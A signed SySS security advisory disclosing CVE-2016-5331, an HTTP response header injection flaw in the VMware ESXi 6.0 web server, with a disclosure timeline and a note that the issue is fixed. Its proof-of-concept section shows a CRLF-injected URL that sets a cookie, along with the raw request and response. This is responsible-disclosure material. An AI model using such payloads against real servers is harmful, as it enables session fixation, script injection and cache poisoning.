-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2016-063
Product: VMware vSphere Hypervisor (ESXi)
Manufacturer: VMware, Inc.
Affected Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1)
VMware vCenter Server 6.0 U2
Tested Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1)
Vulnerability Type: Improper Input Validation (CWE-20)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2016-07-01
Solution Date: 2016-08-04
Public Disclosure: 2016-08-05
CVE Reference: CVE-2016-5331
Authors of Advisory: Matthias Deeg (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
VMware vSphere Hypervisor is a type-1 hypervisor for serving virtual
machines.
The manufacturer describes the product as follows (see [1]):
"Virtualize even the most resource-intensive applications with peace of
mind. VMware vSphere Hypervisor is based on VMware ESXi, the hypervisor
architecture that sets the industry standard for reliability and
performance."
Due to improper input validation, the web server of VMware ESXi 6 is
prone to HTTP response injection attacks.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SySS GmbH found out that the web server of VMware ESXi 6 is
vulnerable to HTTP response injection attacks, as arbitrarily supplied
URL parameters are copied in the HTTP header Location of the server
response without sufficient input validation.
Thus, an attacker can create a specially crafted URL with a specific
URL parameter that injects attacker-controlled data to the response
of the VMware ESXi web server.
Depending on the context, this allows different attacks. If
such a URL is visited by a victim, it may for example be possible to
set web browser cookies in the victim's web browser, execute arbitrary
JavaScript code, or poison caches of proxy servers.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following URL is a simple attack vector to illustrate the HTTP
response header injection vulnerability by setting an
attacker-controlled session cookie named "test" with the value "31337"
within the victim's web browser:
https://<HOST>/?syss%0d%0aset-cookie:test=31337%0d%0at=1
The corresponding HTTP GET request and the VMware ESXi web server
response are as follows:
GET /?syss%0d%0aset-cookie:test=31337%0d%0at=1 HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
HTTP/1.1 303 See Other
Date: Thu, 30 Jun 2016 15:12:23 GMT
Connection: close
Location: /?syss
set-cookie:test=31337
t=1/
X-Frame-Options: DENY
Content-Length: 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The manufacturer VMware has fixed the reported security vulnerability
and disclosed detailed information about the issue and a software update
for affected products in its security advisory VMSA-2016-0010 [4].
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2016-07-01: Vulnerability reported to manufacturer
2016-07-01: Manufacturer acknowledges e-mail with SySS security advisory
2016-07-14: Manufacturer further investigates the reported security
issue
2016-07-22: Manufacturer announces disclosure of this security issue
2016-08-04: Public release of VMware security advisory VMSA-2016-0010
and security update
2016-08-05: Public release of SySS security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product website for VMware vSphere Hypervisor (ESXi)
https://my.vmware.com/web/vmware/info/slug/datacenter_cloud_infrastructure/vmware_vsphere_hypervisor_esxi/6_0
[2] SySS Security Advisory SYSS-2016-063
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-063.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[4] VMware Security Advisory VMSA-2016-0010
http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was independently found and reported by
Matthias Deeg of SySS GmbH, Vladimir Ivanov, Andrey Evlanin, Mikhail
Stepankin, Artem Kondratenko, Arseniy Sharoglazov of Positive
Technologies, Matt Foster of Netcraft Ltd, Eva Esteban Molina of
A2secure and Ammarit Thongthua (see [4]).
E-Mail: matthias.deeg (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQIcBAEBCgAGBQJXpF3hAAoJENmkv2o0rU2rJr0P/RYc3j268fzTLERUG5CvLKYV
HNI1a4p2/Mg0lzc/n1/7aZOzX9eRQe0jVyFkv90/843IWCdofQU3aqLBwFSIsFZP
C9Tv3JYpk4T68uzCIriqxqHgt+qza1evfmPTOP2RHua0iaOOQSohzY/cWo3Uc9Yj
Qag+JmnwPWZJNzkL1i41F6oO6aKurM65XBtmAdKQVQwwJ1WYMpiM3vV71hIq18sO
OSJOgKQQMAR/1U7UVd3IgFIUv4+2mdDPyEdlnzPiTtpmJvZQf8H3k9054auCWBWa
U2WOesD5FsCS4nBmuvlTc+jALlqC2SRRgR1UpiEvXTYYunWrOFustGnj4fFvgg7S
omtMdN8dnWdD6BXZXg2k/yVH0WToVWtwV0meKtSg9b0jOywKBVzoYO19vpchHaz4
/Eyxd8HQHpToM3OgwHagFXosF3TGxwQySPlDHdQD5gYANzDBhS8uQ02Gwx2v9NCX
cC/jbTDUC0fa2qNJL/wwN7unqmrdOkGEYlvTjme6wlDR5axB46GunSH5yNg5OKFl
G1s7lZ+ZbcywBxScLx1k7ITa1tNL3PNet5/Ld6A1hi3yhONmRgkyfgB+YqN04xaR
3b5U6eqnPfm8d52yVPa7zySVc1vN9mrQ87dCmnXWGE9xk++SXoeDLv3PbKrY65Iy
w/x007duLbe7k/xSJ1Ip
=/k7W
-----END PGP SIGNATURE-----
